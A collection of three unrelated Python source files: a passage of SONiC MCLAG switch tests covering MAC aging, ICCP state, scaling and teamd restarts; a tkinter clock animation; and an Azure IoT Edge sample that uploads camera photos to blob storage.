def setup_mclag_interface_member(self, duthost, duthost2):
# shutdown active's port joined to first mclag interface and standby's port joined to last
dut1_team_cfg = duthost.shell("teamdctl {} config dump".format(g_vars['mclag_interfaces'][0]))['stdout']
dut2_team_cfg = duthost.shell("teamdctl {} config dump".format(g_vars['mclag_interfaces'][-1]))['stdout']
dut1_team_port = json.loads(dut1_team_cfg)['ports'].keys()
dut2_team_port = json.loads(dut2_team_cfg)['ports'].keys()
for port1, port2 in zip(dut1_team_port, dut2_team_port):
duthost.shell("config interface shutdown {}".format(port1))
duthost2.shell("config interface shutdown {}".format(port2))
time.sleep(5)
yield
for port1,port2 in zip(dut1_team_port, dut2_team_port):
duthost.shell("config interface startup {}".format(port1))
duthost2.shell("config interface startup {}".format(port2))
time.sleep(5)
def test_traffic_between_servers(self, ptfhost, testbed):
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}_aging.txt".format(test_scenario),
"test_scenario": test_scenario,
"scale": True,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
# gather mac info on orphan ports and mclag interfaces from mclag_arpresponder.conf
res = json.loads(ptfhost.shell("cat /tmp/mclag/mclag_arpresponder.conf")['stdout'])
for index in g_vars['dut1_orphan_ports']:
mac_str = res["eth{}".format(index)].values()[0]
mac = ":".join([mac_str[i:i+2].upper() for i in range(0, 12, 2)])
self.dut1_orphan_ports_mac.append(mac)
for index in g_vars['dut2_orphan_ports']:
mac_str = res["eth{}".format(index)].values()[0]
mac = ":".join([mac_str[i:i+2].upper() for i in range(0, 12, 2)])
self.dut2_orphan_ports_mac.append(mac)
for intf in g_vars['mclag_interfaces']:
mac_str = res['eth{}'.format(int(intf.strip("PortChannel"))-1)].values()[0]
mac = ":".join([mac_str[i:i+2].upper() for i in range(0, 12, 2)])
self.mclag_interface_mac.append(mac)
@pytest.mark.usefixtures("setup_mclag_interface_member")
def test_mclag_age_flag_after_mclag_member_port_down(self, ptfhost, get_mclag_mac_table):
res = json.loads(ptfhost.shell("cat /tmp/mclag/mclag_arpresponder.conf")['stdout'])
mac1_str = res["eth{}".format(int(g_vars['mclag_interfaces'][0].strip("PortChannel"))-1)].values()[0]
mac1 = ":".join([mac1_str[i:i+2].upper() for i in range(0, 12, 2)])
self.dut1_down_port_server_mac.append(mac1)
mac2_str = res["eth{}".format(int(g_vars['mclag_interfaces'][-1].strip("PortChannel"))-1)].values()[0]
mac2 = ":".join([mac2_str[i:i+2].upper() for i in range(0, 12, 2)])
self.dut2_down_port_server_mac.append(mac2)
dut1_mclag_mac, dut2_mclag_mac = get_mclag_mac_table
assert dut1_mclag_mac[self.dut1_down_port_server_mac[0]] == "L", "Mac {} add L flag on dut1 after dut1 mclag {} member port down".format(self.dut1_down_port_server_mac[0], g_vars['mclag_interfaces'][0])
assert dut2_mclag_mac[self.dut1_down_port_server_mac[0]] == "P", "Mac {} add P flag on dut2 after dut1 mclag {} member port down".format(self.dut1_down_port_server_mac[0], g_vars['mclag_interfaces'][0])
assert dut2_mclag_mac[self.dut2_down_port_server_mac[0]] == "L", "Mac {} add L flag on dut2 after dut2 mclag {} member port down".format(self.dut2_down_port_server_mac[0], g_vars['mclag_interfaces'][-1])
assert dut1_mclag_mac[self.dut2_down_port_server_mac[0]] == "P", "Mac {} add P flag on dut1 after dut2 mclag {} member port down".format(self.dut2_down_port_server_mac[0], g_vars['mclag_interfaces'][-1])
def test_mclag_age_flag_after_mclag_member_port_up(self, get_mclag_mac_table):
dut1_mclag_mac, dut2_mclag_mac = get_mclag_mac_table
assert dut1_mclag_mac[self.dut1_down_port_server_mac[0]] == "null", "Mac {} on dut1 mclag interfaces should not add any age flag after dut1 mclag {} member port up".format(self.dut1_down_port_server_mac[0], g_vars['mclag_interfaces'][0])
assert dut2_mclag_mac[self.dut1_down_port_server_mac[0]] == "null", "Mac {} on dut2 mclag interfaces should not add any age flag after dut1 mclag {} member port up".format(self.dut1_down_port_server_mac[0], g_vars['mclag_interfaces'][0])
assert dut2_mclag_mac[self.dut2_down_port_server_mac[0]] == "null", "Mac {} on dut2 mclag interfaces should not add any age flag after dut2 mclag {} member port up".format(self.dut2_down_port_server_mac[0], g_vars['mclag_interfaces'][-1])
assert dut1_mclag_mac[self.dut2_down_port_server_mac[0]] == "null", "Mac {} on dut1 mclag interfaces should not add any age flag after dut2 mclag {} member port up".format(self.dut2_down_port_server_mac[0], g_vars['mclag_interfaces'][-1])
def test_traffic_between_servers_after_mclag_member_port_up(self, ptfhost, testbed):
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}_aging.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"scale": True,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
def test_mclag_age_flag_after_traffic_between_servers(self, get_mclag_mac_table):
dut1_mclag_mac, dut2_mclag_mac = get_mclag_mac_table
# check server macs attach to dut1 orphan ports
for mac in self.dut1_orphan_ports_mac:
assert dut1_mclag_mac[mac] == "P", "Mac {} on dut1 orphan port should add P age flag on dut1".format(mac)
assert dut2_mclag_mac[mac] == "L", "Mac {} on dut1 orphan port should add L age flag on dut2".format(mac)
# check server macs attach to dut2 orphan ports
for mac in self.dut2_orphan_ports_mac:
assert dut2_mclag_mac[mac] == "P", "Mac {} on dut2 orphan port should add P age flag on dut2".format(mac)
assert dut1_mclag_mac[mac] == "L", "Mac {} on dut2 orphan port should add L age flag on dut1".format(mac)
# check server macs attach to mclag interfaces
for mac in self.mclag_interface_mac:
assert dut1_mclag_mac[mac] == "null", "Mac {} on dut1 mclag interfaces should not add any age flag".format(mac)
assert dut2_mclag_mac[mac] == "null", "Mac {} on dut2 mclag interfaces should not add any age flag".format(mac)
def test_mclag_age_flag_before_age(self, duthost, duthost2, ptfhost, get_mclag_mac_table):
dut1_mclag_mac, dut2_mclag_mac = get_mclag_mac_table
# check server macs attach to dut1 orphan ports
for mac in self.dut1_orphan_ports_mac:
assert dut1_mclag_mac[mac] == "P", "Mac {} on dut1 orphan port should add P age flag on dut1".format(mac)
assert dut2_mclag_mac[mac] == "L", "Mac {} on dut1 orphan port should add L age flag on dut2".format(mac)
# check server macs attach to dut2 orphan ports
for mac in self.dut2_orphan_ports_mac:
assert dut2_mclag_mac[mac] == "P", "Mac {} on dut2 orphan port should add P age flag on dut2".format(mac)
assert dut1_mclag_mac[mac] == "L", "Mac {} on dut2 orphan port should add L age flag on dut1".format(mac)
# check server macs attach to mclag interfaces
for mac in self.mclag_interface_mac:
assert dut1_mclag_mac[mac] == "null", "Mac {} on dut1 mclag interfaces should not add any age flag".format(mac)
assert dut2_mclag_mac[mac] == "null", "Mac {} on dut2 mclag interfaces should not add any age flag".format(mac)
def test_mac_aging_on_peer(self, duthost2, ptfhost, testbed, setup_aging_time):
ptfhost.shell("supervisorctl stop arp_responder")
i = 1
interval = 60
while(i <= self.aging_time*2/interval):
# only send traffic to dut1 ports
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}_aging.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"scale": True,
"ignore_ports": g_vars['dut2_link_server_interfaces']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
time.sleep(interval)
i += 1
dut2_mac = duthost2.shell("show mac|grep Dynamic|awk '{print $3}'")['stdout_lines']
res = set(self.dut2_orphan_ports_mac) & set(dut2_mac)
assert not res, "Mac on dut2 should aged after setting aging time to {}s and already waited for {}s".format(self.aging_time, self.aging_time*2)
time.sleep(60) # wait for mclag mac sync
def test_mclag_age_flag_after_aging(self, get_mclag_mac_table):
dut1_mclag_mac, dut2_mclag_mac = get_mclag_mac_table
# check server macs attach to dut1 orphan ports
for mac in self.dut1_orphan_ports_mac:
assert dut1_mclag_mac[mac] == "P", "Mac {} on dut1 orphan port should add P age flag on dut1 after dut2 mac age".format(mac)
assert dut2_mclag_mac[mac] == "L", "Mac {} on dut1 orphan port should add L age flag on dut2 after dut2 mac age".format(mac)
# check server macs attach to dut2 orphan ports
for mac in self.dut2_orphan_ports_mac:
assert dut2_mclag_mac.has_key(mac) == False, "Mac {} on dut2 orphan port should be deleted on dut2 after dut2 mac age".format(mac)
assert dut1_mclag_mac.has_key(mac) == False, "Mac {} on dut2 orphan port should be deleted on dut1 after dut2 mac age".format(mac)
# check server macs attach to mclag interfaces
for mac in self.mclag_interface_mac:
assert dut1_mclag_mac[mac] == "P", "Mac {} on dut1 mclag interfaces should add P age flag after dut2 mac age".format(mac)
assert dut2_mclag_mac[mac] == "L", "Mac {} on dut2 mclag interfaces should add L age flag after dut2 mac age".format(mac)
def test_relearn_after_mac_age(self, ptfhost, testbed):
ptfhost.shell("supervisorctl start arp_responder")
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}_aging.txt".format(test_scenario),
"test_scenario": test_scenario,
"scale": True,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
def test_mclag_age_flag_after_relearn(self, get_mclag_mac_table):
dut1_mclag_mac, dut2_mclag_mac = get_mclag_mac_table
# check server macs attach to dut1 orphan ports
for mac in self.dut1_orphan_ports_mac:
assert dut1_mclag_mac[mac] == "P", "Mac {} on dut1 orphan port should add P age flag on dut1".format(mac)
assert dut2_mclag_mac[mac] == "L", "Mac {} on dut1 orphan port should add L age flag on dut2".format(mac)
# check server macs attach to dut2 orphan ports
for mac in self.dut2_orphan_ports_mac:
assert dut2_mclag_mac[mac] == "P", "Mac {} on dut2 orphan port should add P age flag on dut2".format(mac)
assert dut1_mclag_mac[mac] == "L", "Mac {} on dut2 orphan port should add L age flag on dut1".format(mac)
# check server macs attach to mclag interfaces
for mac in self.mclag_interface_mac:
assert dut1_mclag_mac[mac] == "P", "Mac {} on dut1 mclag interfaces age flag should not changed after dut2 relearn".format(mac)
assert dut2_mclag_mac[mac] == "L", "Mac {} on dut2 mclag interfaces age flag should not changed after dut2 relearn".format(mac)
class TestCase12_ICCP_CSM():
@pytest.fixture(scope="function", autouse=True)
def setup_logrotate_cron_task(self, duthost, duthost2):
# Disable logrotate cron task
duthost.shell("sed -i 's/^/#/g' /etc/cron.d/logrotate")
duthost2.shell("sed -i 's/^/#/g' /etc/cron.d/logrotate")
# Wait for logrotate from previous cron task run to finish
i = 1
while(i<=6):
res1 = duthost.shell("! pgrep -f logrotate", module_ignore_errors=True)['rc']
res2 = duthost2.shell("! pgrep -f logrotate", module_ignore_errors=True)['rc']
if res1 == 0 and res2 == 0:
break
else:
i += 1
time.sleep(5)
duthost.shell("logrotate -f /etc/logrotate.conf")
duthost2.shell("logrotate -f /etc/logrotate.conf")
yield
duthost.shell("sed -i 's/^#//g' /etc/cron.d/logrotate")
duthost2.shell("sed -i 's/^#//g' /etc/cron.d/logrotate")
def test_active_restart(self, duthost, localhost):
# reboot dut and wait for recovered
reboot(duthost, localhost, wait=180)
status = duthost.shell("mclagdctl -i {} dump state|grep keepalive".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert status == "OK", "MCLAG keepalive status should be OK on dut1"
iccp_csm_log = duthost.shell("cat /var/log/syslog|grep iccp_csm_transit")['stdout']
match_msg_regex = re.compile("^.*?from NONEXISTENT to INITIALIZED.\n(.*?\n)??.*?from .*? to CAPREC.\n(.*?\n)??.*?from .*? to OPERATIONAL")
assert match_msg_regex.search(iccp_csm_log) != None
def test_standby_restart(self, duthost2, localhost):
# reboot dut and wait for recovered
reboot(duthost2, localhost, wait=180)
status = duthost2.shell("mclagdctl -i {} dump state|grep keepalive".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert status == "OK", "MCLAG keepalive status should be OK on dut2"
iccp_csm_log = duthost2.shell("cat /var/log/syslog|grep iccp_csm_transit")['stdout']
match_msg_regex = re.compile("^.*?from NONEXISTENT to INITIALIZED.\n(.*?\n)??.*?from .*? to CAPREC.\n(.*?\n)??.*?from .*? to OPERATIONAL")
assert match_msg_regex.search(iccp_csm_log) != None
class TestCase13_Scaling():
# max num <= 252
port_server_count = 100
@pytest.fixture(scope="class", autouse=True)
def setup_servers(self, duthost, duthost2, ptfhost):
duthost.shell("sysctl -w net.ipv4.neigh.default.gc_thresh1=10000")
duthost.shell("sysctl -w net.ipv4.neigh.default.gc_thresh2=10000")
duthost.shell("sysctl -w net.ipv4.neigh.default.gc_thresh3=10000")
duthost2.shell("sysctl -w net.ipv4.neigh.default.gc_thresh1=10000")
duthost2.shell("sysctl -w net.ipv4.neigh.default.gc_thresh2=10000")
duthost2.shell("sysctl -w net.ipv4.neigh.default.gc_thresh3=10000")
ptf_extra_vars = {
'test_scenario' : test_scenario,
'dut1_all_interfaces' : g_vars['dut1_all_interfaces'],
'dut1_link_server_interfaces': g_vars['dut1_link_server_interfaces'],
'mclag_port_channel_id_list' : g_vars['mclag_port_channel_id_list'],
'mclag_link_vm_interfaces' : g_vars['mclag_link_vm_interfaces'],
'port_server_count' : self.port_server_count,
'arp_responder_args' : '--conf /tmp/mclag/mclag_arpresponder.conf -e',
'scaling_test' : True
}
ptfhost.host.options['variable_manager'].extra_vars = ptf_extra_vars
ptfhost.template(src="mclag/mclag_switch_info.j2", dest="/tmp/mclag/mclag_switch_info_{}_scaling.txt".format(test_scenario))
ptfhost.copy(src="scripts/arp_responder.py", dest="/opt")
ptfhost.template(src="scripts/arp_responder.conf.j2", dest="/etc/supervisor/conf.d/arp_responder.conf")
ptfhost.template(src="mclag/mclag_arpresponder.j2", dest="/tmp/mclag/mclag_arpresponder.conf")
ptfhost.shell("supervisorctl reread")
ptfhost.shell("supervisorctl update")
ptfhost.shell("supervisorctl start arp_responder")
yield
ptfhost.shell("supervisorctl stop arp_responder")
# clear neighbors used for test
vlans = json.loads(duthost.shell("sonic-cfggen -d --var-json VLAN")['stdout']).keys()
for vlan in vlans:
duthost.shell("ip link set arp off dev {0}; ip link set arp on dev {0}".format(vlan))
duthost2.shell("ip link set arp off dev {0}; ip link set arp on dev {0}".format(vlan))
def test_traffic_between_servers(self, ptfhost, testbed):
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}_scaling.txt".format(test_scenario),
"test_scenario": test_scenario,
"scale": True,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
def test_mac_arp_sync(self, duthost, duthost2, ptfhost):
random_check_num = self.port_server_count
res = json.loads(ptfhost.shell("cat /tmp/mclag/mclag_arpresponder.conf")['stdout'])
dut1_ports = natsorted(g_vars['dut1_port_alias']['port_name_map'].keys())
dut2_ports = natsorted(g_vars['dut2_port_alias']['port_name_map'].keys())
dut1_orphan_ports = dut1_ports[len(g_vars['dut1_link_server_interfaces'])/2-2:len(g_vars['dut1_link_server_interfaces'])/2] + \
dut1_ports[len(g_vars['dut1_link_server_interfaces'])-2:len(g_vars['dut1_link_server_interfaces'])]
dut2_orphan_ports = dut2_ports[len(g_vars['dut2_link_server_interfaces'])/2-2:len(g_vars['dut2_link_server_interfaces'])/2] + \
dut2_ports[len(g_vars['dut2_link_server_interfaces'])-2:len(g_vars['dut2_link_server_interfaces'])]
for t in ["mac", "arp"]:
if t == "mac":
dut1_entry_res = duthost.shell("show mac")['stdout_lines']
dut2_entry_res = duthost2.shell("show mac")['stdout_lines']
else:
dut1_entry_res = duthost.shell("show arp")['stdout_lines']
dut2_entry_res = duthost2.shell("show arp")['stdout_lines']
assert dut1_entry_res, "Can not get DUT1 {} entry".format(t)
assert dut2_entry_res, "Can not get DUT2 {} entry".format(t)
# syncheck on dut1 orphan ports
for dut_port, ptf_port in zip(dut1_orphan_ports, g_vars['dut1_orphan_ports']):
if t == "mac":
dut_res = [line.split()[2] for line in dut1_entry_res if dut_port in line]
peer_res = [line.split()[2] for line in dut2_entry_res if g_vars['peer_link_interface'] in line]
ptf_entry = res['eth{}'.format(ptf_port)].values()
else:
dut_res = [line.split()[0] for line in dut1_entry_res if dut_port in line]
peer_res = [line.split()[0] for line in dut2_entry_res if g_vars['peer_link_interface'] in line]
ptf_entry = res['eth{}'.format(ptf_port)].keys()
dut_entry = ["".join(entry.split(":")).lower() for entry in dut_res]
peer_entry = ["".join(entry.split(":")).lower() for entry in peer_res]
random_entry = set(random.sample(ptf_entry, random_check_num))
assert random_entry <= set(dut_entry), "{} on dut1 {} should match servers on ptf eth{}".format(t, dut_port, ptf_port)
assert random_entry <= set(peer_entry), "{} learned from active orphan port {} should point to peer link on standby".format(t, dut_port)
# syncheck on dut2 orphan ports
for dut_port, ptf_port in zip(dut2_orphan_ports, g_vars['dut2_orphan_ports']):
if t == "mac":
dut_res = [line.split()[2] for line in dut2_entry_res if dut_port in line]
peer_res = [line.split()[2] for line in dut1_entry_res if g_vars['peer_link_interface'] in line]
ptf_entry = res['eth{}'.format(ptf_port)].values()
else:
dut_res = [line.split()[0] for line in dut2_entry_res if dut_port in line]
peer_res = [line.split()[0] for line in dut1_entry_res if g_vars['peer_link_interface'] in line]
ptf_entry = res['eth{}'.format(ptf_port)].keys()
dut_entry = ["".join(entry.split(":")).lower() for entry in dut_res]
peer_entry = ["".join(entry.split(":")).lower() for entry in peer_res]
random_entry = set(random.sample(ptf_entry, random_check_num))
assert random_entry <= set(dut_entry), "{} on dut1 {} should match servers on ptf eth{}".format(t, dut_port, ptf_port)
assert random_entry <= set(peer_entry), "{} learned from standby orphan port {} should point to peer link on active".format(t, dut_port)
# syncheck on mclag interfaces
mclag_res = duthost.shell("mclagdctl dump state|grep 'MCLAG Interface'")['stdout']
mclag_intf = natsorted(mclag_res.split(":")[1].strip().split(","))
for intf in mclag_intf:
if t == "mac":
dut1_res = [line.split()[2] for line in dut1_entry_res if intf in line]
dut2_res = [line.split()[2] for line in dut2_entry_res if intf in line]
ptf_entry = res['eth{}'.format(int(intf.strip("PortChannel"))-1)].values()
else:
dut1_res = [line.split()[0] for line in dut1_entry_res if intf in line]
dut2_res = [line.split()[0] for line in dut2_entry_res if intf in line]
ptf_entry = res['eth{}'.format(int(intf.strip("PortChannel"))-1)].keys()
dut1_entry = ["".join(entry.split(":")).lower() for entry in dut1_res]
dut2_entry = ["".join(entry.split(":")).lower() for entry in dut2_res]
random_entry = set(random.sample(ptf_entry, random_check_num))
assert random_entry <= set(dut1_entry), "{} on dut1 {} should match servers on ptf eth{}".format(t, intf, int(intf.strip("PortChannel"))-1)
assert random_entry <= set(dut2_entry), "{} on dut2 {} should match servers on ptf eth{}".format(t, intf, int(intf.strip("PortChannel"))-1)
class TestCase14_CornerTest():
@pytest.fixture(scope="function")
def setup_stop_teamd_on_active(self, duthost):
duthost.shell("systemctl stop teamd")
yield
duthost.shell("systemctl start teamd")
duthost.shell("systemctl start iccpd")
# after restart teamd, PortChannel will be removed from Bridge in kernel, so we restart swss to recover
duthost.shell("systemctl restart swss")
wait_until(60, 10, duthost.critical_services_fully_started)
@pytest.fixture(scope="function")
def setup_stop_teamd_on_standby(self, duthost2):
duthost2.shell("systemctl stop teamd")
yield
duthost2.shell("systemctl start teamd")
duthost2.shell("systemctl start iccpd")
duthost2.shell("systemctl restart swss")
wait_until(60, 10, duthost2.critical_services_fully_started)
@pytest.mark.usefixtures("setup_stop_teamd_on_active")
def test_stop_teamd_on_active(self, duthost, ptfhost, testbed):
assert wait_until(100, 10, check_teamd_status, ptfhost, ptf=True, base=0, select=False), \
"Server port attached to active device should be deselected after active device stopped teamd"
time.sleep(30)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut2_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": g_vars['dut1_link_server_interfaces']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
def test_start_teamd_on_active(self, duthost, ptfhost, testbed):
assert wait_until(100, 10, check_teamd_status, ptfhost, ptf=True, base=0, select=True), \
"Server port attached to active device should be selected after active device startup teamd"
time.sleep(30)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.usefixtures("setup_stop_teamd_on_standby")
def test_stop_teamd_on_standby(self, duthost2, ptfhost, testbed):
assert wait_until(100, 10, check_teamd_status, ptfhost, ptf=True, base=len(g_vars['dut1_all_interfaces']), select=False), \
"Server port attached to standby device should be deselected after standby device stopped teamd"
time.sleep(30)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": g_vars['dut2_link_server_interfaces']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
def test_start_teamd_on_standby(self, duthost2, ptfhost, testbed):
assert wait_until(100, 10, check_teamd_status, ptfhost, ptf=True, base=len(g_vars['dut1_all_interfaces']), select=True), \
"Server port attached to standby device should be selected after standby device startup teamd"
time.sleep(30)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
|
functions.py
|
from math import sin
from math import cos
import math
from tkinter import *
from time import sleep
import time
# import sched, time
import threading
import GUI
act = False
alpha = 0
def lines_move(tk, canvas1, line1, line2, line3):
global alpha
x2 = 100 * sin(math.radians(alpha))
y2 = 100 * cos(math.radians(alpha))
x4 = 100 * sin(math.radians(alpha / 60))
y4 = 100 * cos(math.radians(alpha / 60))
x6 = 80 * sin(math.radians(alpha / 3600))
y6 = 80 * cos(math.radians(alpha / 3600))
canvas1.coords(line1, 150, 200, (150 + x2), (200 - y2))
canvas1.coords(line2, 150, 200, (150 + x4), (200 - y4))
canvas1.coords(line3, 150, 200, (150 + x6), (200 - y6))
tk.update_idletasks()
tk.update()
alpha = alpha + 6
# print(str(alpha) + ", " + str(150 - x2) + ", " + str(200 - y2))
sleep(1)
def time_start(tkint, canv, l1, l2, l3):
global act
act = True
while act == True:
t1 = threading.Thread(target=lines_move(tkint, canv, l1, l2, l3))
# t2 = threading.Thread(target=GUI.run_app())
t1.start()
# t2.start()
def time_stop():
global act
act = False
def switch_frames(frame1, frame2):
frame1.place_forget()
frame2.place(x=0, y=0)
|
main.py
|
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for
# full license information.
import time
import os
import sys
import asyncio
from six.moves import input
import threading
from azure.iot.device import IoTHubModuleClient, MethodResponse, Message
from blobfileuploader import BlobFileUploader
import cv2
import datetime
BLOB_ON_EDGE_MODULE = ""
BLOB_ON_EDGE_ACCOUNT_NAME = ""
BLOB_ON_EDGE_ACCOUNT_KEY = ""
PHOTO_CONTAINER_NAME = ""
PHOTO_DATA_FOLDER = ""
EDGE_DEVICEID = ""
uploadCycleSecKey = "upload_cycle_sec"
uploadCycleSecReportedKey = "current_upload_cycle_sec"
uploadStatusReportedKey = "photo_uploading"
uploadNotifyStatusKey = "photo_upload_notify"
uploadCycleSec = 10
quitFlag = False
uploadStared = False
uploadNotifyStatus = False
uploadNotifyOutputName = "upload_notification"
def updateReportedTwin(module_client):
global uploadCycleSec, uploadStared, uploadCycleSecReportedKey, uploadStatusReportedKey
reported = {
uploadCycleSecReportedKey: uploadCycleSec,
uploadStatusReportedKey: uploadStared
}
module_client.patch_twin_reported_properties(reported)
async def main(videoPath, fileUploader):
global uploadCycleSecKey, uploadCycleSec, quitFlag
try:
if not sys.version >= "3.5.3":
raise Exception( "The sample requires python 3.5.3+. Current version of Python: %s" % sys.version )
print ( "IoT Hub Client for Python" )
# The client object is used to interact with your Azure IoT hub.
module_client = IoTHubModuleClient.create_from_edge_environment()
# connect the client.
module_client.connect()
currentTwin = module_client.get_twin()
dtwin = currentTwin['desired']
if uploadCycleSecKey in dtwin:
uploadCycleSec = dtwin[uploadCycleSecKey]
updateReportedTwin(module_client)
# define behavior for receiving an input message on input1
def twin_patch_listener(module_client, param_lock):
global uploadCycleSec
print("twin patch listener started.")
while True:
data = module_client.receive_twin_desired_properties_patch() # blocking call
print("Received desired properties updated.")
if uploadCycleSecKey in data:
param_lock.acquire()
uploadCycleSec = data[uploadCycleSecKey]
param_lock.release()
print("Updated {}={}".format(uploadCycleSecKey, uploadCycleSec))
updateReportedTwin(module_client)
param_lock.acquire()
isBreak = quitFlag
param_lock.release()
if isBreak:
print("twin patch listener will be finished")
break
async def upload_photo_handler(videoPath, uploader, module_client, param_lock):
global PHOTO_DATA_FOLDER, uploadCycleSec, uploadStared, uploadNotifyOutputName, uploadNotifyStatus
await uploader.initialize()
print("upload photo handler started.")
try:
print("creating VideoStream")
# cap = cv2.VideoStream(int(videoPath))
cap = cv2.VideoCapture(int(videoPath))
print("...Created")
time.sleep(1)
if cap.isOpened():
print("VideoCapture has been opened")
else:
print("VideoCapture has not been opened")
while True:
param_lock.acquire()
sleepTime = uploadCycleSec
isUpload = uploadStared
isNotify = uploadNotifyStatus
param_lock.release()
time.sleep(sleepTime)
if isUpload:
now = datetime.datetime.now()
photoFileName = 'photo-{0:%Y%m%d%H%M%S%f}'.format(now) + '.jpg'
filename = os.path.join(PHOTO_DATA_FOLDER, photoFileName)
print("Try to take photo - name={}".format(filename))
ret, frame = cap.read()
cv2.imwrite(filename, frame)
print("Saved photo file")
await uploader.uploadFile(filename)
os.remove(filename)
if isNotify:
notifyMsg = "{\"timestamp\":\"%s\",\"filename\":\"%s\"}"
msg = notifyMsg % (datetime.datetime.utcnow().isoformat(), photoFileName)
sendMsg = Message(msg)
module_client.send_message_to_output(sendMsg, uploadNotifyOutputName)
else:
print("Waiting for start")
param_lock.acquire()
isBreak = quitFlag
param_lock.release()
if isBreak:
print("upload photo handler will be finished")
break
except Exception as error:
print('upload photo handler exception - {}'.format(error))
def direct_method_listener(module_client, param_lock):
global uploadStared, uploadNotifyStatus
while True:
try:
print("waiting for method invocation...")
methodRequest = module_client.receive_method_request()
print("received method invocation - '{}'({})".format(methodRequest.name, methodRequest.payload))
response = {}
response_status = 200
if methodRequest.name == "Start":
response['message'] ="Upload started."
param_lock.acquire()
uploadStared = True
if (methodRequest.payload is None) == False:
if uploadNotifyStatusKey in methodRequest.payload:
uploadNotifyStatus = methodRequest.payload[uploadNotifyStatusKey]
else:
response['message'] = "payload should be '{\"" + uploadCycleSecKey + "\": true|false}"
param_lock.release()
print("Received - Start order")
if uploadNotifyStatus:
print(" with notofication")
updateReportedTwin(module_client)
elif methodRequest.name == "Stop":
param_lock.acquire()
uploadStared = False
param_lock.release()
response['message'] ="Upload stopped."
print("Received - Stop order")
updateReportedTwin(module_client)
else:
response['message'] = "bad method name"
response_status = 404
print("Bad Method Request!")
except Exception as error:
print("exception happens - {}".format(error))
response['message'] = "Exception - {}".format(error)
methodResponse = MethodResponse(methodRequest.request_id, response_status, payload=response)
module_client.send_method_response(methodResponse)
param_lock = threading.Lock()
twinThread = threading.Thread(target=twin_patch_listener, args=(module_client, param_lock))
twinThread.daemon = True
twinThread.start()
methodThread = threading.Thread(target=direct_method_listener, args=(module_client, param_lock))
methodThread.daemon = True
methodThread.start()
# uploadPhotoThread = threading.Thread(target=upload_photo_handler, args=(videoPath, fileUploader, param_lock))
# uploadPhotoThread.daemon = True
# uploadPhotoThread.start()
# Schedule task for Photo Uploader
listeners = asyncio.gather(upload_photo_handler(videoPath, fileUploader, module_client, param_lock))
print ( "The sample is now waiting for direct method and desired twin update. ")
def stdin_listener():
while True:
try:
selection = input("Press Q to quit\n")
if selection == "Q" or selection == "q":
print("Quitting...")
param_lock.acquire()
quitFlag = True
param_lock.release()
break
except:
time.sleep(10)
# Run the stdin listener in the event loop
loop = asyncio.get_event_loop()
